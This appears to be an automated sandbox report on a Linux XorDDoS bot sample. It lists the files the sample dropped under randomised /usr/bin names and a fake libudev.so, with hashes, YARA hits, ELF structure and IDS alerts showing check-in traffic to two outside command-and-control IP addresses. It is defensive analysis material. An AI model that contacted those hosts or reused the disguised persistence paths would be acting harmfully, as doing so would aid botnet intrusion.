Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/vijnytmbcx

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.1973608061476275
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoje:/fUywKQ7Fb1pNL/p5PfjQn36Eue
MD5:	58E08A371ADCDC184B14882A86C3A02C
SHA1:	8765DC9224E8498F88E7B8AE30FC85E09083969B
SHA-256:	4A6804C00F500DD586178B08334716E6EC6589A0AD4A4B4ADE9B640581F5E752
SHA-512:	F230EE9E73111A0FC794B743F78E78794F32925E7E68B7C07B77C93C574CD60C09B9C3E4BEB7E29F98502E8560DD094F8D3571D87CE5AE659F8922500D6FAFAB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vijnytmbcx, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vijnytmbcx, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vijnytmbcx, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vijnytmbcx, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/wvicexcnqi

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, missing section headers at 548576
Category:	dropped
Size (bytes):	438272
Entropy (8bit):	6.35226375016752
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66y2:/fUywKQ7Fb1pNL/p5PV
MD5:	31D3202ACA5DC1AD3A7F68813EE644A6
SHA1:	B7D4E64EEB7A88FA9143687990506CBF8ED335F4
SHA-256:	5602B71CE2B9897B340E59415E61CC7423D9E3DE8BD197158C0632580EFE6D1B
SHA-512:	F4D49E8D32C661EDA3D68F48A5BE351108A9FD15EDBA2A10E0F308306CDEBE5F3BA40B348814B587D5E5D8D1FE6D3261ED849F64177739403DD58F06F62950B8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wvicexcnqi, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wvicexcnqi, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wvicexcnqi, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/xaxopmwzau

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197370713957003
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36EojE:/fUywKQ7Fb1pNL/p5PfjQn36EuE
MD5:	DA1E3752488A7DF1E7BFEF777B4AFD08
SHA1:	7DD3B15C101F3CD3FF42F880621CF5308A5497CC
SHA-256:	87CCD87E17A5464F7F501AF424C8778F44C1C1D1B30D08E4EE2F8BFD50848F6A
SHA-512:	7CC19B6754F09F0C96F3D1AF08701BB0BFB3E3D5FDD2DB084106E96764E96E5C4E0907A655727CC99AD0E9C1A42EAC405C50276A9C3FF8BC6E5F0B415313AEB3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/xaxopmwzau, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/xaxopmwzau, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/xaxopmwzau, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/xaxopmwzau, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/xjdcsmwtwe

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197360181062395
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoje:/fUywKQ7Fb1pNL/p5PfjQn36Eue
MD5:	A5D8165AF18DA100E4FC0B5E182DB260
SHA1:	F7C7F09A07195235F02EF2F400290EA361E4A205
SHA-256:	A39C01BE4A4D447B6854B33966FA90DFB46DABEAE77FCA335427E680933A98EF
SHA-512:	D27345433C6FFCB99BF0B8CF83B928219343A42EB33FED3736777A59138B6E194A6669F494F6E5BA108E13D7B5448DF81A04D1F730AD2235C85ABBC1E337B9F0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/xjdcsmwtwe, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/xjdcsmwtwe, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/xjdcsmwtwe, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/xjdcsmwtwe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/yfaogzsdtv

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197363879492368
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eojr:/fUywKQ7Fb1pNL/p5PfjQn36Eur
MD5:	759FC1FB5286189A09717AEA0FDE9801
SHA1:	38BB8ABBC7839DB2BF5A5F5263A2B98EFC1D3386
SHA-256:	5C5743B4E22B74FEBA10D23E15B978E32FF87EB92D7A49F606566087349E6242
SHA-512:	30B541AE5FE48507ECA35A1B13934FC753560226AFBFDF0B0F7E05D095287CC793E03F599F4A5EDB8E9CC456459BAE09B8BC80A5B8BFE9DE2FBFABFD71F31252
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/yfaogzsdtv, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/yfaogzsdtv, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/yfaogzsdtv, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/yfaogzsdtv, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/ygqhgbaeei

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197373551591652
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoj5:/fUywKQ7Fb1pNL/p5PfjQn36Eu5
MD5:	EA0139D29F09585000D854A5755D4701
SHA1:	0A1348D8DD8B0E96D15B85DF385798CC7E630B6D
SHA-256:	913CE9A5A156865720B91CCFE5F4356BDFC0E25522DB84DD97C9EAD1079142D9
SHA-512:	55893C850658D2B87B0F2CC842B72A3CBF9DD4EC52A7B7D12D669C570BFEE6E0AC1A3A823AF22FA1C0BF08418D0806F15428A9443C3DCEB690C5730637AA3AF8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ygqhgbaeei, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ygqhgbaeei, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ygqhgbaeei, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ygqhgbaeei, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/zqylkjndwx

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197361119302257
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eojj:/fUywKQ7Fb1pNL/p5PfjQn36Euj
MD5:	9863C52AA5FFB44BE58647EE47948996
SHA1:	94A2F3F80D650E102D8EB03CEB4E2447C625EBE4
SHA-256:	2ED884BA159E92DBB1DD1968487E946214739B3616644C185299B7AF0D31D885
SHA-512:	4151972BC4FC17C68848185065283A7ED505BA5B4D22B2914A9BFF51E8B60E046DB43F5E08C3B453F647F7F54F0EF400F6F0CCFC5AB04D4F9EA5AF0B31777A8F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zqylkjndwx, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zqylkjndwx, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zqylkjndwx, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zqylkjndwx, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/lib/libudev.so

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548616
Entropy (8bit):	6.1973146095696485
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoj:/fUywKQ7Fb1pNL/p5PfjQn36Eu
MD5:	694A672878A1F7945C020A0A3CA74367
SHA1:	148CAEAA8AC7FDF46D48FC2D1D0020D1BF41D442
SHA-256:	75BFD448E4274CC4E5804C43768F62A36CCB3FC3B1DF06E14D9C892DAA2CDE19
SHA-512:	A239845B91D64B8559192E4683E2FAA16AD0C8987BFC142CF692F620BD5FEFA0D8D0BBE2E7F5F59651435EEC4350E3574171D33E7CD4656136B539BCCD00FB60
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Entropy (8bit):	6.1973146095696485
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	eTASxT3bjO.elf
File size:	548'616 bytes
MD5:	694a672878a1f7945c020a0a3ca74367
SHA1:	148caeaa8ac7fdf46d48fc2d1d0020d1bf41d442
SHA256:	75bfd448e4274cc4e5804c43768f62a36ccb3fc3b1df06e14d9c892daa2cde19
SHA512:	a239845b91d64b8559192e4683e2faa16ad0c8987bfc142cf692f620bd5fefa0d8d0bbe2e7f5f59651435eec4350e3574171d33e7cd4656136b539bccd00fb60
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoj:/fUywKQ7Fb1pNL/p5PfjQn36Eu
TLSH:	5CC45C56E383E2F7C82705B0134BF7BF4620B6359461CD86B7989D5AB9338F22A4D352
File Content Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts.......................... ... ................I..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	547576
Section Header Size:	40
Number of Section Headers:	26
Header String Table Index:	25

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	4
.text	PROGBITS	0x8048110	0x110	0x681f8	0x0	0x6	AX	16
__libc_freeres_fn	PROGBITS	0x80b0310	0x68310	0x100f	0x0	0x6	AX	16
__libc_thread_freeres_fn	PROGBITS	0x80b1320	0x69320	0x1db	0x0	0x6	AX	16
.fini	PROGBITS	0x80b14fc	0x694fc	0x1c	0x0	0x6	AX	4
.rodata	PROGBITS	0x80b1520	0x69520	0x152e0	0x0	0x2	A	32
__libc_subfreeres	PROGBITS	0x80c6800	0x7e800	0x30	0x0	0x2	A	4
__libc_atexit	PROGBITS	0x80c6830	0x7e830	0x4	0x0	0x2	A	4
__libc_thread_subfreeres	PROGBITS	0x80c6834	0x7e834	0x8	0x0	0x2	A	4
.eh_frame	PROGBITS	0x80c683c	0x7e83c	0x60a0	0x0	0x2	A	4
.gcc_except_table	PROGBITS	0x80cc8dc	0x848dc	0x11b	0x0	0x2	A	1
.tdata	PROGBITS	0x80cd9f8	0x849f8	0x14	0x0	0x403	WAT	4
.tbss	NOBITS	0x80cda0c	0x84a0c	0x2c	0x0	0x403	WAT	4
.ctors	PROGBITS	0x80cda0c	0x84a0c	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x80cda14	0x84a14	0xc	0x0	0x3	WA	4
.jcr	PROGBITS	0x80cda20	0x84a20	0x4	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x80cda24	0x84a24	0x2c	0x0	0x3	WA	4
.got	PROGBITS	0x80cda50	0x84a50	0x8	0x4	0x3	WA	4
.got.plt	PROGBITS	0x80cda58	0x84a58	0xc	0x4	0x3	WA	4
.data	PROGBITS	0x80cda80	0x84a80	0xb40	0x0	0x3	WA	32
.bss	NOBITS	0x80ce5c0	0x855c0	0x6778	0x0	0x3	WA	32
__libc_freeres_ptrs	NOBITS	0x80d4d38	0x855c0	0x14	0x0	0x3	WA	4
.comment	PROGBITS	0x0	0x855c0	0x422	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x859e2	0x116	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x849f7	0x849f7	6.2039	0x5	R E	0x1000	.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x849f8	0x80cd9f8	0x80cd9f8	0xbc8	0x7354	3.6649	0x6	RW	0x1000	.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4	.note.ABI-tag
TLS	0x849f8	0x80cd9f8	0x80cd9f8	0x14	0x40	2.6610	0x4	R	0x4	.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/09/24-18:18:13.475831	TCP	2020381	ET TROJAN DDoS.XOR Checkin	47930	1520	192.168.2.13	199.188.111.217
04/09/24-18:16:32.776231	TCP	2020381	ET TROJAN DDoS.XOR Checkin	41150	1520	192.168.2.13	137.175.88.241

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 9, 2024 18:16:32.038393021 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:16:32.205121994 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:16:32.205830097 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:16:32.549879074 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:16:32.776109934 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:16:32.776231050 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:16:32.942945957 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:16:32.943125963 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:16:39.247236967 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:16:39.247699022 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:16:49.420507908 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:16:49.420644045 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:16:59.688638926 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:16:59.688942909 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:10.246340990 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:10.246669054 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.427977085 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.427987099 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.428108931 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.428134918 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.429676056 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.429681063 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.429723024 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.429723024 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.429738998 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.429776907 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.429779053 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.429868937 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.429873943 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.429887056 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.429919958 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.429919958 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.429970980 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.430011034 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.430061102 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.430141926 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:17:24.430284977 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:17:24.430329084 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.969706059 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969718933 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969742060 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969753027 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969789982 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969800949 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969827890 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969839096 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969861031 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.969892025 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.970026016 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970026970 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970026970 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970026970 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970026970 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970026970 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970026970 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970026970 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970134974 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970134974 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970259905 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.970287085 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.970298052 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.970299959 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970309019 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.970320940 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970330954 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970335960 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.970355988 CEST	41150	1520	192.168.2.13	137.175.88.241
Apr 9, 2024 18:18:02.970366001 CEST	1520	41150	137.175.88.241	192.168.2.13
Apr 9, 2024 18:18:02.970385075 CEST	41150	1520	192.168.2.13	137.175.88.241
